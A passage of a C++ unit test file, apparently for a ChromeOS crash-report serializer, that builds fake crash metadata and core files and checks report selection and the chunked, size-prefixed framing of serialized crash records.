// These should be serialized, even though the `alreadyuploaded` file
// exists.
uploaded_meta_ = crash_directory.Append("uploaded.meta");
uploaded_log_ = crash_directory.Append("uploaded.log");
uploaded_already_ = crash_directory.Append("uploaded.alreadyuploaded");
if (!CreateFile(uploaded_meta_, "payload=uploaded.log\ndone=1\n",
uploaded_meta_time))
return false;
if (!CreateFile(uploaded_log_, "", now))
return false;
if (!CreateFile(uploaded_already_, "", now))
return false;
// This should be ignored as corrupt. Payload can't be /.
root_payload_meta_ = crash_directory.Append("root_payload.meta");
if (!test_util::CreateFile(root_payload_meta_,
"payload=/\n"
"done=1\n"))
return false;
// These should be serialized -- serializing devcore files is always OK
// (as opposed to sending them, which is only sometimes okay).
devcore_meta_ = crash_directory.Append("devcore.meta");
devcore_devcore_ = crash_directory.Append("devcore.devcore");
if (!CreateFile(devcore_meta_,
"payload=devcore.devcore\n"
"done=1\n",
devcore_meta_time))
return false;
if (!CreateFile(devcore_devcore_, "", now))
return false;
// This should be ignored, since metadata is corrupted.
corrupted_meta_ = crash_directory.Append("corrupted.meta");
if (!CreateFile(corrupted_meta_, "!@#$%^&*\ndone=1\n", now))
return false;
// This should be ignored, since no payload info is recorded.
empty_meta_ = crash_directory.Append("empty.meta");
if (!CreateFile(empty_meta_, "done=1\n", now))
return false;
// This should be ignored, since the payload file does not exist.
nonexistent_meta_ = crash_directory.Append("nonexistent.meta");
if (!CreateFile(nonexistent_meta_,
"payload=nonexistent.log\n"
"done=1\n",
now))
return false;
// These should be ignored, since the payload is an unknown kind.
unknown_meta_ = crash_directory.Append("unknown.meta");
unknown_xxx_ = crash_directory.Append("unknown.xxx");
if (!CreateFile(unknown_meta_,
"payload=unknown.xxx\n"
"done=1\n",
now))
return false;
if (!CreateFile(unknown_xxx_, "", now))
return false;
// This should be ignored, since it's incomplete.
old_incomplete_meta_ = crash_directory.Append("old_incomplete.meta");
if (!CreateFile(old_incomplete_meta_, "payload=good.log\n", now))
return false;
if (!test_util::TouchFileHelper(old_incomplete_meta_, now - hour * 24))
return false;
// This should be ignored, since it's incomplete.
new_incomplete_meta_ = crash_directory.Append("new_incomplete.meta");
if (!CreateFile(new_incomplete_meta_, "payload=nonexistent.log\n", now))
return false;
// This should be serialized since the OS timestamp is recent.
recent_os_meta_ = crash_directory.Append("recent_os.meta");
if (!CreateFile(recent_os_meta_,
base::StringPrintf(
"payload=recent_os.log\n"
"os_millis=%" PRId64 "\n"
"done=1\n",
(now - base::Time::UnixEpoch()).InMilliseconds()),
recent_os_meta_time)) {
return false;
}
recent_os_log_ = crash_directory.Append("recent_os.log");
if (!CreateFile(recent_os_log_, "", now))
return false;
// This should be serialized despite the old OS timestamp.
old_os_meta_ = crash_directory.Append("old_os.meta");
if (!CreateFile(old_os_meta_,
base::StringPrintf("payload=good.log\n"
"os_millis=%" PRId64 "\n"
"done=1\n",
((now - base::Time::UnixEpoch()) -
base::TimeDelta::FromDays(200))
.InMilliseconds()),
old_os_meta_time)) {
return false;
}
// Create large metadata with the size of 1MiB + 1byte. This should be
// ignored as it's too big.
large_meta_ = crash_directory.Append("large.meta");
if (!CreateFile(large_meta_, std::string(1024 * 1024 + 1, 'x'), now)) {
return false;
}
return true;
}
base::ScopedTempDir temp_dir_;
base::FilePath test_dir_;
base::FilePath good_meta_;
base::FilePath good_log_;
base::FilePath absolute_meta_;
base::FilePath absolute_log_;
base::FilePath uploaded_meta_;
base::FilePath uploaded_log_;
base::FilePath uploaded_already_;
base::FilePath root_payload_meta_;
base::FilePath devcore_meta_;
base::FilePath devcore_devcore_;
base::FilePath empty_meta_;
base::FilePath corrupted_meta_;
base::FilePath nonexistent_meta_;
base::FilePath unknown_meta_;
base::FilePath unknown_xxx_;
base::FilePath old_incomplete_meta_;
base::FilePath new_incomplete_meta_;
base::FilePath recent_os_meta_;
base::FilePath recent_os_log_;
base::FilePath old_os_meta_;
base::FilePath large_meta_;
};
// Verifies that PickCrashFiles() selects exactly the six serializable
// reports created by CreateTestCrashFiles() while leaving every file --
// including the corrupt/ignored ones -- untouched on disk.
TEST_F(CrashSerializerTest, PickCrashFiles) {
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
const base::FilePath crash_directory =
paths::Get(paths::kSystemCrashDirectory);
ASSERT_TRUE(CreateDirectory(crash_directory));
ASSERT_TRUE(CreateTestCrashFiles(crash_directory));
std::vector<util::MetaFile> to_serialize;
serializer.PickCrashFiles(crash_directory, &to_serialize);
// Everything should still exist; picking crashes for serialization must not
// delete or modify any on-disk files.
EXPECT_TRUE(base::PathExists(good_meta_));
EXPECT_TRUE(base::PathExists(good_log_));
EXPECT_TRUE(base::PathExists(absolute_meta_));
EXPECT_TRUE(base::PathExists(absolute_log_));
EXPECT_TRUE(base::PathExists(uploaded_meta_));
EXPECT_TRUE(base::PathExists(uploaded_log_));
EXPECT_TRUE(base::PathExists(uploaded_already_));
EXPECT_TRUE(base::PathExists(root_payload_meta_));
EXPECT_TRUE(base::PathExists(devcore_meta_));
EXPECT_TRUE(base::PathExists(devcore_devcore_));
EXPECT_TRUE(base::PathExists(empty_meta_));
EXPECT_TRUE(base::PathExists(corrupted_meta_));
EXPECT_TRUE(base::PathExists(nonexistent_meta_));
EXPECT_TRUE(base::PathExists(unknown_meta_));
EXPECT_TRUE(base::PathExists(unknown_xxx_));
EXPECT_TRUE(base::PathExists(old_incomplete_meta_));
EXPECT_TRUE(base::PathExists(new_incomplete_meta_));
EXPECT_TRUE(base::PathExists(recent_os_meta_));
EXPECT_TRUE(base::PathExists(recent_os_log_));
EXPECT_TRUE(base::PathExists(old_os_meta_));
EXPECT_TRUE(base::PathExists(large_meta_));
// Exactly the six valid reports (good, absolute, uploaded, devcore,
// recent_os, old_os) are picked up.
ASSERT_EQ(6, to_serialize.size());
// Sort the reports to allow for deterministic testing
util::SortReports(&to_serialize);
// NOTE(review): expected order presumably follows the per-meta timestamps
// assigned in CreateTestCrashFiles() -- confirm against util::SortReports.
EXPECT_EQ(old_os_meta_.value(), to_serialize[0].first.value());
EXPECT_EQ(good_meta_.value(), to_serialize[1].first.value());
EXPECT_EQ(absolute_meta_.value(), to_serialize[2].first.value());
EXPECT_EQ(uploaded_meta_.value(), to_serialize[3].first.value());
EXPECT_EQ(recent_os_meta_.value(), to_serialize[4].first.value());
EXPECT_EQ(devcore_meta_.value(), to_serialize[5].first.value());
}
// End-to-end test: serialize one system crash and one user crash (the user
// crash includes a core dump) and verify the length-prefixed
// FetchCrashesResponse record stream that SerializeCrashes() writes.
// Fix: removed two copy-paste duplicated assertions (the `collector()` check
// for the system crash and the `crash_id()` check for the core record were
// each asserted twice in a row).
TEST_F(CrashSerializerTest, SerializeCrashes) {
  std::vector<util::MetaFile> crashes_to_serialize;

  // Establish the client ID.
  ASSERT_TRUE(test_util::CreateClientIdFile());

  // Set up mock sending so we use the fake sleep function
  ASSERT_TRUE(SetMockCrashSending(true));

  // Create the system crash directory, and crash files in it.
  const base::FilePath system_dir = paths::Get(paths::kSystemCrashDirectory);
  ASSERT_TRUE(base::CreateDirectory(system_dir));
  const base::FilePath system_meta_file = system_dir.Append("0.0.0.0.meta");
  const base::FilePath system_log = system_dir.Append("0.0.0.0.log");
  const base::FilePath system_processing =
      system_dir.Append("0.0.0.0.processing");
  const char system_meta[] =
      "payload=0.0.0.0.log\n"
      "exec_name=exec_foo\n"
      "fake_report_id=123\n"
      "upload_var_prod=foo\n"
      "done=1\n"
      "upload_var_reportTimeMillis=1000000\n";
  ASSERT_TRUE(test_util::CreateFile(system_meta_file, system_meta));
  ASSERT_TRUE(test_util::CreateFile(system_log, "system log data"));
  util::CrashInfo system_info;
  EXPECT_TRUE(system_info.metadata.LoadFromString(system_meta));
  system_info.payload_file = system_log;
  system_info.payload_kind = "log";
  EXPECT_TRUE(base::Time::FromString("25 Apr 2018 1:23:44 GMT",
                                     &system_info.last_modified));
  crashes_to_serialize.emplace_back(system_meta_file, std::move(system_info));

  // Create a user crash directory, and crash files in it.
  const base::FilePath user_dir = paths::Get("/home/user/hash/crash");
  ASSERT_TRUE(base::CreateDirectory(user_dir));
  const base::FilePath user_meta_file = user_dir.Append("0.0.0.0.meta");
  const base::FilePath user_log = user_dir.Append("0.0.0.0.log");
  const base::FilePath user_core = user_dir.Append("0.0.0.0.core");
  const base::FilePath user_processing = user_dir.Append("0.0.0.0.processing");
  const char user_meta[] =
      "payload=0.0.0.0.log\n"
      "exec_name=exec_bar\n"
      "fake_report_id=456\n"
      "upload_var_prod=bar\n"
      "done=1\n"
      "upload_var_reportTimeMillis=2000000\n";
  ASSERT_TRUE(test_util::CreateFile(user_meta_file, user_meta));
  ASSERT_TRUE(test_util::CreateFile(user_log, "user log data"));
  ASSERT_TRUE(test_util::CreateFile(user_core, "user core"));
  util::CrashInfo user_info;
  EXPECT_TRUE(user_info.metadata.LoadFromString(user_meta));
  user_info.payload_file = user_log;
  user_info.payload_kind = "log";
  EXPECT_TRUE(base::Time::FromString("25 Apr 2018 1:24:01 GMT",
                                     &user_info.last_modified));
  crashes_to_serialize.emplace_back(user_meta_file, std::move(user_info));

  // Set up the serializer. Core fetching is enabled so the user core is
  // included in the output stream.
  std::vector<base::TimeDelta> sleep_times;
  Serializer::Options options;
  options.fetch_coredumps = true;
  options.sleep_function = base::Bind(&test_util::FakeSleep, &sleep_times);
  Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
  base::FilePath out = test_dir_.Append("SerializeCrashes");
  ASSERT_TRUE(test_util::CreateFile(out, ""));
  serializer.set_output_for_testing(out);

  serializer.SerializeCrashes(crashes_to_serialize);
  // One (fake) sleep per serialized crash.
  EXPECT_EQ(2, sleep_times.size());

  // We shouldn't be processing any crashes still.
  EXPECT_FALSE(base::PathExists(system_processing));
  EXPECT_FALSE(base::PathExists(user_processing));

  std::string written;
  ASSERT_TRUE(base::ReadFileToString(out, &written));

  // Deserialize the data: each record is a big-endian uint64 byte count
  // followed by that many bytes of serialized FetchCrashesResponse.
  std::vector<crash::FetchCrashesResponse> resps;
  uint64_t pos = 0;
  while (pos < written.size()) {
    std::string size_str = written.substr(pos, sizeof(uint64_t));
    uint64_t size;
    base::ReadBigEndian(size_str.data(), &size);
    pos += sizeof(size);
    // All of our payloads are small, so don't need to combine subsequent
    // response protos into one.
    crash::FetchCrashesResponse resp;
    resp.ParseFromString(written.substr(pos, size));
    resps.push_back(resp);
    pos += size;
  }
  // Expect 5 records: system crash info + its log blob, then user crash
  // info + its log blob + its core dump.
  ASSERT_EQ(resps.size(), 5);

  // Verify system crash
  EXPECT_EQ(resps[0].crash_id(), 0);
  ASSERT_TRUE(resps[0].has_crash());
  EXPECT_EQ(resps[0].crash().exec_name(), "exec_foo");
  EXPECT_EQ(resps[0].crash().prod(), "foo");
  EXPECT_EQ(resps[0].crash().ver(), "undefined");
  EXPECT_EQ(resps[0].crash().sig(), "");
  EXPECT_EQ(resps[0].crash().in_progress_integration_test(), "");
  EXPECT_EQ(resps[0].crash().collector(), "");
  int num_fields = resps[0].crash().fields_size();
  ASSERT_GE(num_fields, 7);
  EXPECT_EQ(resps[0].crash().fields(6).key(), "guid");
  EXPECT_EQ(resps[0].crash().fields(6).text(), kFakeClientId);
  EXPECT_EQ(resps[1].crash_id(), 0);
  ASSERT_TRUE(resps[1].has_blob());
  EXPECT_EQ(resps[1].blob().key(), "upload_file_log");
  EXPECT_EQ(resps[1].blob().filename(), "0.0.0.0.log");
  EXPECT_EQ(resps[1].blob().blob(), "system log data");

  // Verify user crash
  EXPECT_EQ(resps[2].crash_id(), 1);
  ASSERT_TRUE(resps[2].has_crash());
  EXPECT_EQ(resps[2].crash().exec_name(), "exec_bar");
  EXPECT_EQ(resps[2].crash().prod(), "bar");
  EXPECT_EQ(resps[2].crash().ver(), "undefined");
  EXPECT_EQ(resps[2].crash().sig(), "");
  EXPECT_EQ(resps[2].crash().in_progress_integration_test(), "");
  EXPECT_EQ(resps[2].crash().collector(), "");
  num_fields = resps[2].crash().fields_size();
  ASSERT_GE(num_fields, 7);
  EXPECT_EQ(resps[2].crash().fields(6).key(), "guid");
  EXPECT_EQ(resps[2].crash().fields(6).text(), kFakeClientId);
  EXPECT_EQ(resps[3].crash_id(), 1);
  ASSERT_TRUE(resps[3].has_blob());
  EXPECT_EQ(resps[3].blob().key(), "upload_file_log");
  EXPECT_EQ(resps[3].blob().filename(), "0.0.0.0.log");
  EXPECT_EQ(resps[3].blob().blob(), "user log data");
  EXPECT_EQ(resps[4].crash_id(), 1);
  // proto3 doesn't create has_XXX methods for string oneof fields, so don't
  // check has_core()
  EXPECT_EQ(resps[4].core(), "user core");

  // The uploaded crash files should not be removed.
  EXPECT_TRUE(base::PathExists(system_meta_file));
  EXPECT_TRUE(base::PathExists(system_log));
  EXPECT_TRUE(base::PathExists(user_meta_file));
  EXPECT_TRUE(base::PathExists(user_log));
  EXPECT_TRUE(base::PathExists(user_core));
}
// Verifies the on-disk framing of a single FetchCrashesResponse: a
// big-endian uint64 size prefix followed by the serialized proto bytes.
TEST_F(CrashSerializerTest, WriteFetchCrashesResponse) {
crash::FetchCrashesResponse resp;
resp.set_crash_id(0x1234'5678'9abc'def0);
// Core contents deliberately include a NUL byte ("\00" is an octal escape)
// to prove binary data survives framing; length 4 is passed explicitly.
resp.set_core(std::string("\00\x11\x22\x33", 4));
std::string expected;
resp.SerializeToString(&expected);
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteFetchCrashesResponse");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(serializer.WriteFetchCrashesResponse(resp));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
// Read the size and verify that it matches what we expect.
std::string actual_size_str = actual.substr(0, sizeof(uint64_t));
uint64_t actual_size;
base::ReadBigEndian(actual_size_str.data(), &actual_size);
EXPECT_EQ(expected.size(), actual_size);
// Note that we don't verify that the size in bytes matches, because to do so
// we'd either have to:
// 1) Reproduce the logic in WriteFetchCrashesResponse that converts the size
// to a string, or
// 2) Hard-code an expected size, which would be brittle and subject to
// breakage if the protobuf serialization format changes at all in future.
EXPECT_EQ(expected, actual.substr(sizeof(uint64_t)));
}
// WriteFetchCrashesResponse must report failure when the output file cannot
// be appended to.
TEST_F(CrashSerializerTest, WriteFetchCrashesResponse_WriteFail) {
  Serializer::Options options;
  Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
  // Deliberately never create this file -- Append in serializer will fail.
  const base::FilePath missing_out =
      test_dir_.Append("WriteFetchCrashesResponse_WriteFail");
  serializer.set_output_for_testing(missing_out);
  crash::FetchCrashesResponse response;
  response.set_crash_id(42);
  response.set_core("asdf");
  EXPECT_FALSE(serializer.WriteFetchCrashesResponse(response));
}
// Verifies that WriteBlobs() emits one framed FetchCrashesResponse per blob,
// each tagged with the given crash_id, and that the stream can be parsed
// back losslessly.
TEST_F(CrashSerializerTest, WriteBlobs_Basic) {
std::vector<crash::CrashBlob> blobs;
crash::CrashBlob blob1;
blob1.set_key("1701d");
blob1.set_filename("jean.luc.picard");
blob1.set_blob("boldly go");
blobs.push_back(blob1);
crash::CrashBlob blob2;
blob2.set_key("nx01");
blob2.set_filename("jonathan.archer");
blob2.set_blob("temporal cold war");
blobs.push_back(blob2);
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteBlobs_Basic");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(serializer.WriteBlobs(/*crash_id=*/42, blobs));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
// Walk the output record by record: big-endian uint64 size prefix, then
// that many bytes of serialized FetchCrashesResponse.
uint64_t pos = 0;
for (const auto& blob : blobs) {
std::string actual_size_str = actual.substr(pos, sizeof(uint64_t));
pos += sizeof(uint64_t);
uint64_t actual_size;
base::ReadBigEndian(actual_size_str.data(), &actual_size);
crash::FetchCrashesResponse resp;
resp.ParseFromString(actual.substr(pos, actual_size));
EXPECT_EQ(resp.crash_id(), 42);
EXPECT_EQ(resp.blob().key(), blob.key());
EXPECT_EQ(resp.blob().filename(), blob.filename());
EXPECT_EQ(resp.blob().blob(), blob.blob());
pos += actual_size;
}
EXPECT_EQ(pos, actual.size()); // should be at end of string
}
// Verifies blob chunking across many blob sizes: blobs larger than
// |max_proto_bytes| must be split over several FetchCrashesResponse protos
// that reassemble to the original contents.
// Fix: the blob contents were built with std::string('A', i), which invokes
// the (count, char) fill constructor with swapped arguments -- producing 65
// ('A') copies of char(i) for every blob, so blob sizes never actually
// varied. std::string(i, 'A') builds the intended i-byte blob.
TEST_F(CrashSerializerTest, WriteBlobs_ManySizes) {
  Serializer::Options options;
  options.max_proto_bytes = 18;  // choose an arbitrary (but small) maximum
  Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
  base::FilePath out = test_dir_.Append("WriteBlobs_ManySizes");
  ASSERT_TRUE(test_util::CreateFile(out, ""));
  serializer.set_output_for_testing(out);
  std::vector<crash::CrashBlob> blobs;
  for (int i = 0; i < options.max_proto_bytes * 5; i++) {
    crash::CrashBlob blob;
    blob.set_key(base::StringPrintf("%d", i));
    blob.set_filename(base::StringPrintf("%d.blob", i));
    blob.set_blob(std::string(i, 'A'));  // i-byte blob (fill constructor)
    blobs.push_back(blob);
  }
  ASSERT_TRUE(serializer.WriteBlobs(/*crash_id=*/0xc0de, blobs));
  std::string actual;
  ASSERT_TRUE(base::ReadFileToString(out, &actual));
  // Parse the framed stream back, merging consecutive records that share a
  // key (chunks of one oversized blob) into a single reassembled blob.
  std::vector<crash::CrashBlob> actual_blobs;
  uint64_t pos = 0;
  while (pos < actual.size()) {
    std::string actual_size_str = actual.substr(pos, sizeof(uint64_t));
    pos += sizeof(uint64_t);
    uint64_t actual_size;
    base::ReadBigEndian(actual_size_str.data(), &actual_size);
    crash::FetchCrashesResponse resp;
    resp.ParseFromString(actual.substr(pos, actual_size));
    pos += actual_size;
    EXPECT_EQ(resp.crash_id(), 0xc0de);
    crash::CrashBlob blob = resp.blob();
    // No single chunk may exceed the configured maximum.
    EXPECT_LE(blob.blob().size(), options.max_proto_bytes);
    if (actual_blobs.size() > 0 && actual_blobs.back().key() == blob.key()) {
      EXPECT_EQ(actual_blobs.back().filename(), blob.filename());
      actual_blobs.back().set_blob(actual_blobs.back().blob() + blob.blob());
    } else {
      actual_blobs.push_back(blob);
    }
  }
  ASSERT_EQ(actual_blobs.size(), blobs.size());
  for (size_t i = 0; i < actual_blobs.size(); i++) {
    EXPECT_EQ(actual_blobs[i].key(), blobs[i].key());
    EXPECT_EQ(actual_blobs[i].filename(), blobs[i].filename());
    EXPECT_EQ(actual_blobs[i].blob(), blobs[i].blob());
  }
}
// Writing an empty blob list succeeds without touching the output file.
TEST_F(CrashSerializerTest, WriteBlobs_Empty) {
  Serializer::Options options;
  Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
  // The output file deliberately does not exist; nothing should be written
  // to it for an empty blob list.
  serializer.set_output_for_testing(test_dir_.Append("WriteBlobs_Empty"));
  std::vector<crash::CrashBlob> no_blobs;
  EXPECT_TRUE(serializer.WriteBlobs(/*crash_id=*/0, no_blobs));
}
// WriteBlobs must report failure when the output file cannot be appended to.
TEST_F(CrashSerializerTest, WriteBlobs_Failure) {
  Serializer::Options options;
  Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
  // Deliberately never create this file -- Append in serializer will fail.
  serializer.set_output_for_testing(test_dir_.Append("WriteBlobs_Failure"));
  crash::CrashBlob single_blob;
  single_blob.set_key("key mckeyface");
  single_blob.set_filename("key.face");
  single_blob.set_blob("asdf");
  std::vector<crash::CrashBlob> blobs;
  blobs.push_back(single_blob);
  EXPECT_FALSE(serializer.WriteBlobs(/*crash_id=*/1, blobs));
}
// Verifies that a core dump small enough to fit in one proto is written as a
// single framed FetchCrashesResponse carrying the raw core bytes.
TEST_F(CrashSerializerTest, WriteCoredump_Basic) {
// Core dumps can and do have null bytes in them.
std::string core_contents("\x00\x11\x22\x33", 4);
ASSERT_EQ(core_contents.size(), 4);
// Build the exact proto we expect WriteCoredump to emit.
crash::FetchCrashesResponse resp;
resp.set_crash_id(0x1234'5678'9abc'def0);
resp.set_core(core_contents);
std::string expected;
resp.SerializeToString(&expected);
base::FilePath core = test_dir_.Append("core");
ASSERT_TRUE(test_util::CreateFile(core, core_contents));
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteCoredump");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(
serializer.WriteCoredump(/*crash_id=*/0x1234'5678'9abc'def0, core));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
// The record is framed as a big-endian uint64 size prefix plus proto bytes.
std::string actual_size_str = actual.substr(0, sizeof(uint64_t));
uint64_t actual_size;
base::ReadBigEndian(actual_size_str.data(), &actual_size);
EXPECT_EQ(expected.size(), actual_size);
EXPECT_EQ(expected, actual.substr(sizeof(uint64_t)));
}
// Verifies that a core dump larger than |max_proto_bytes| is split into two
// framed FetchCrashesResponse records sharing the same crash_id.
TEST_F(CrashSerializerTest, WriteCoredump_LargerThanChunkSize) {
// 16 bytes of core vs. a 10-byte chunk limit => expect a 10-byte chunk
// followed by a 6-byte chunk.
std::string core_contents("0123456789abcdef");
base::FilePath core = test_dir_.Append("core");
ASSERT_TRUE(test_util::CreateFile(core, core_contents));
crash::FetchCrashesResponse resp1;
resp1.set_crash_id(1);
resp1.set_core("0123456789");
std::string expected1;
resp1.SerializeToString(&expected1);
crash::FetchCrashesResponse resp2;
resp2.set_crash_id(1); // same crash id
resp2.set_core("abcdef");
std::string expected2;
resp2.SerializeToString(&expected2);
Serializer::Options options;
options.max_proto_bytes = 10;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteCoredump_LargerThanChunkSize");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(serializer.WriteCoredump(/*crash_id=*/1, core));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
// First record: size prefix + first chunk proto.
uint64_t pos = 0;
std::string actual_size_str1 = actual.substr(0, sizeof(uint64_t));
pos += sizeof(uint64_t);
uint64_t actual_size1;
base::ReadBigEndian(actual_size_str1.data(), &actual_size1);
EXPECT_EQ(expected1.size(), actual_size1);
EXPECT_EQ(expected1, actual.substr(pos, actual_size1));
pos += actual_size1;
// Second record: remainder of the core; substr(pos) also asserts nothing
// trails the final record.
std::string actual_size_str2 = actual.substr(pos, sizeof(uint64_t));
pos += sizeof(uint64_t);
uint64_t actual_size2;
base::ReadBigEndian(actual_size_str2.data(), &actual_size2);
EXPECT_EQ(expected2.size(), actual_size2);
EXPECT_EQ(expected2, actual.substr(pos));
}
// Verify that core dump splitting works at many different core sizes (with
// different relationships to the chunk size).
// Fixes: (1) std::string('0', core_size) invoked the (count, char) fill
// constructor with swapped arguments, creating 48 ('0') copies of
// char(core_size) -- the core was always 48 bytes, so sizes never varied;
// std::string(core_size, '0') builds the intended core_size-byte core.
// (2) The parse loop read the size prefix with actual.substr(0, ...) on
// every iteration, re-reading the first record's size instead of the one at
// the current offset; it must use substr(pos, ...).
TEST_F(CrashSerializerTest, WriteCoredump_ManySizes) {
  const int kChunkSize = 10;
  Serializer::Options options;
  options.max_proto_bytes = kChunkSize;
  Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
  for (int core_size = 1; core_size <= kChunkSize * 5; core_size++) {
    std::string core_contents(core_size, '0');
    base::FilePath core = test_dir_.Append("core");
    ASSERT_TRUE(test_util::CreateFile(core, core_contents));
    // Recreate (truncate) the output file on each iteration.
    base::FilePath out = test_dir_.Append("WriteCoredump_ManySizes");
    ASSERT_TRUE(test_util::CreateFile(out, ""));
    serializer.set_output_for_testing(out);
    ASSERT_TRUE(serializer.WriteCoredump(/*crash_id=*/1, core));
    std::string actual;
    ASSERT_TRUE(base::ReadFileToString(out, &actual));
    // Reassemble the core from the framed chunk records and compare.
    std::string assembled_core;
    crash::FetchCrashesResponse resp;
    uint64_t pos = 0;
    while (pos < actual.size()) {
      std::string actual_size_str = actual.substr(pos, sizeof(uint64_t));
      pos += sizeof(uint64_t);
      uint64_t actual_size;
      base::ReadBigEndian(actual_size_str.data(), &actual_size);
      resp.ParseFromString(actual.substr(pos, actual_size));
      EXPECT_EQ(resp.crash_id(), 1) << "core size: " << core_size;
      EXPECT_LE(resp.core().size(), kChunkSize) << "core size: " << core_size;
      assembled_core += resp.core();
      pos += actual_size;
    }
    EXPECT_EQ(assembled_core, core_contents) << "core size: " << core_size;
  }
}
// WriteCoredump must fail cleanly when the core file does not exist.
TEST_F(CrashSerializerTest, WriteCoredump_Nonexistent) {
  Serializer::Options options;
  Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
  const base::FilePath missing_core = test_dir_.Append("nonexistent.core");
  EXPECT_FALSE(serializer.WriteCoredump(/*crash_id=*/0, missing_core));
}
// Identifies which crash-report companion file (if any) is deliberately left
// uncreated by CrashSerializerParameterizedTest.
enum MissingFile {
kNone, // every file present
kPayloadFile, // the payload named in the metadata (makes serialization fail)
kLogFile, // the upload_file_log file
kTextFile, // the upload_text_* file
kBinFile, // the upload_file_* binary attachment
kCoreFile, // the core dump
};
// Parameterized over <absolute_paths, fetch_core, missing_file>: whether the
// metadata references attachments by absolute or relative path, whether core
// dumps should be fetched, and which companion file (if any) is absent.
class CrashSerializerParameterizedTest
: public CrashSerializerTest,
public ::testing::WithParamInterface<
std::tuple<bool, bool, MissingFile>> {
protected:
void SetUp() override {
// Unpack the tuple into named members before the base fixture runs.
std::tie(absolute_paths_, fetch_core_, missing_file_) = GetParam();
CrashSerializerTest::SetUp();
}
bool absolute_paths_; // metadata uses absolute attachment paths
bool fetch_core_; // Serializer::Options::fetch_coredumps
MissingFile missing_file_; // which companion file to omit
};
// Exercises SerializeCrash() across every parameter combination. Only a
// missing payload file makes SerializeCrash() return false; any other
// missing companion file merely drops the corresponding field/blob/core
// from the output.
TEST_P(CrashSerializerParameterizedTest, SerializeCrash) {
const base::FilePath system_dir = paths::Get(paths::kSystemCrashDirectory);
ASSERT_TRUE(base::CreateDirectory(system_dir));
// Payload file (the main crash artifact named in the metadata).
const base::FilePath payload_file_relative("0.0.0.0.payload");
const base::FilePath payload_file_absolute =
system_dir.Append(payload_file_relative);
const std::string payload_contents = "foobar_payload";
if (missing_file_ != kPayloadFile) {
ASSERT_TRUE(test_util::CreateFile(payload_file_absolute, payload_contents));
}
const base::FilePath& payload_file =
absolute_paths_ ? payload_file_absolute : payload_file_relative;
// Log attachment referenced via upload_file_log.
const base::FilePath log_file_relative("0.0.0.0.log");
const base::FilePath log_file_absolute = system_dir.Append(log_file_relative);
const std::string log_contents = "foobar_log";
if (missing_file_ != kLogFile) {
ASSERT_TRUE(test_util::CreateFile(log_file_absolute, log_contents));
}
const base::FilePath& log_file =
absolute_paths_ ? log_file_absolute : log_file_relative;
// Text attachment referenced via upload_text_footext; its contents become
// an inline field rather than a blob.
const base::FilePath text_var_file_relative("data.txt");
const base::FilePath text_var_file_absolute =
system_dir.Append(text_var_file_relative);
const std::string text_var_contents = "upload_text_contents";
if (missing_file_ != kTextFile) {
ASSERT_TRUE(
test_util::CreateFile(text_var_file_absolute, text_var_contents));
}
const base::FilePath& text_var_file =
absolute_paths_ ? text_var_file_absolute : text_var_file_relative;
// Binary attachment referenced via upload_file_foofile.
const base::FilePath file_var_file_relative("data.bin");
const base::FilePath file_var_file_absolute =
system_dir.Append(file_var_file_relative);
const std::string file_var_contents = "upload_file_contents";
if (missing_file_ != kBinFile) {
ASSERT_TRUE(
test_util::CreateFile(file_var_file_absolute, file_var_contents));
}
const base::FilePath& file_var_file =
absolute_paths_ ? file_var_file_absolute : file_var_file_relative;
// Core dump next to the meta file; picked up only when fetch_core_ is set.
const base::FilePath core_file_relative("0.0.0.0.core");
const base::FilePath core_file_absolute =
system_dir.Append(core_file_relative);
const std::string core_contents = "corey_mccoreface";
if (missing_file_ != kCoreFile) {
ASSERT_TRUE(test_util::CreateFile(core_file_absolute, core_contents));
}
// Metadata for the crash; upload_var_guid must be superseded by the
// client_id passed in CrashDetails below.
brillo::KeyValueStore metadata;
metadata.SetString("exec_name", "fake_exec_name");
metadata.SetString("ver", "fake_chromeos_ver");
metadata.SetString("upload_var_prod", "fake_product");
metadata.SetString("upload_var_ver", "fake_version");
metadata.SetString("sig", "fake_sig");
metadata.SetString("upload_var_guid", "SHOULD_NOT_BE_USED");
metadata.SetString("upload_var_foovar", "bar");
metadata.SetString("upload_var_in_progress_integration_test", "test.Test");
metadata.SetString("upload_var_collector", "fake_collector");
metadata.SetString("upload_text_footext", text_var_file.value());
metadata.SetString("upload_file_log", log_file.value());
metadata.SetString("upload_file_foofile", file_var_file.value());
metadata.SetString("error_type", "fake_error");
util::CrashDetails details = {
.meta_file = base::FilePath(system_dir).Append("0.0.0.0.meta"),
.payload_file = payload_file,
.payload_kind = "fake_payload",
.client_id = kFakeClientId,
.metadata = metadata,
};
Serializer::Options options;
options.fetch_coredumps = fetch_core_;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
crash::CrashInfo info;
std::vector<crash::CrashBlob> blobs;
base::FilePath core_path;
// SerializeCrash fails only when the payload itself is missing.
EXPECT_EQ(serializer.SerializeCrash(details, &info, &blobs, &core_path),
missing_file_ != kPayloadFile);
if (missing_file_ == kPayloadFile) {
return;
